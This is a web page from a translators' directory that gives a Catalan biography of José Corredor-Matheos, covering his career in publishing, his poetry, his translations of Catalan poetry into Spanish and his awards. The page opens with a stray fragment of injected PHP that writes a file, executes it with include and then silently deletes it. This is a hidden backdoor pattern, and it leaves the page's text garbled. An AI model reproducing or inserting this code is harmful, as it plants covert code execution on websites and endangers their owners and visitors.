");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> José Corredor- Matheos
Facebook Twitter
Portada > El espacio de los traductores > Espanyol > José Corredor- Matheos

José Corredor- Matheos

Visat núm. 12
(octubre 2011)
por Antoni Clapés
José Corredor-Matheos va néixer a Alcázar de San Juan (Ciudad Real) el 1929. El 1936 la família es va traslladar a Catalunya, primer a Vilanova i la Geltrú, i cinc anys més tard a Barcelona, ciutat on va estudiar la carrera de dret —que no ha exercit mai— i on encara resideix.

Professionalment s’ha dedicat al món editorial. Ha estat director dels Suplementos de l’Enciclopedia Espasa, assessor artístic del Col·legi d’Arquitectes de Catalunya i Balears, cap de redacció de Cuadernos de Arquitectura y Urbanismo, crític d’art de Revista, Destino, Triunfo, Cambio 16 i director de l’enciclopèdia Gran Larousse Català.

És autor de més d’una cinquantena llibres sobre temes d’arts plàstiques, disseny, arquitectura, ceràmica i història de la joguina.

L’activitat, però, per la qual Corredor-Matheos és més conegut, sens dubte, és per la seva faceta de refinat poeta. És autor de quinze llibres de poemes i de vuit plaquettes. També destaca la seva tasca de traductor a l’espanyol d’obres contemporànies de poesia catalana, feina que ha dut a terme amb l’afany de donar a conèixer la poesia catalana fora de l’àmbit lingüístic.

Els seus darrers llibres de poemes són: El don de la ignorancia (2004), Un pez que va por el jardín (2007) i Desolación y vuelo. Poesía reunida (2011). La seva poesia ha estat traduïda a l’anglès, italià, àrab, xinès, japonès, macedoni, lituà i occità.

Ha estat distingit amb els premis Boscán de Poesía (1961), Nacional de Traducción (1984), Nacional d’Arts Plàstiques de la Generalitat de Catalunya (1993), Nacional de Poesía (2005) i Ciutat de Barcelona de literatura en llengua española 2007.

José Corredor-Matheos. Foto: Andreu Clapés
Buscador de traductores
A-B-C-D - E-F-G - H - I
J - K - L - M - N - O - P - Q - R
S-T-U-V-W-X-Y-Z
Con el soporte de: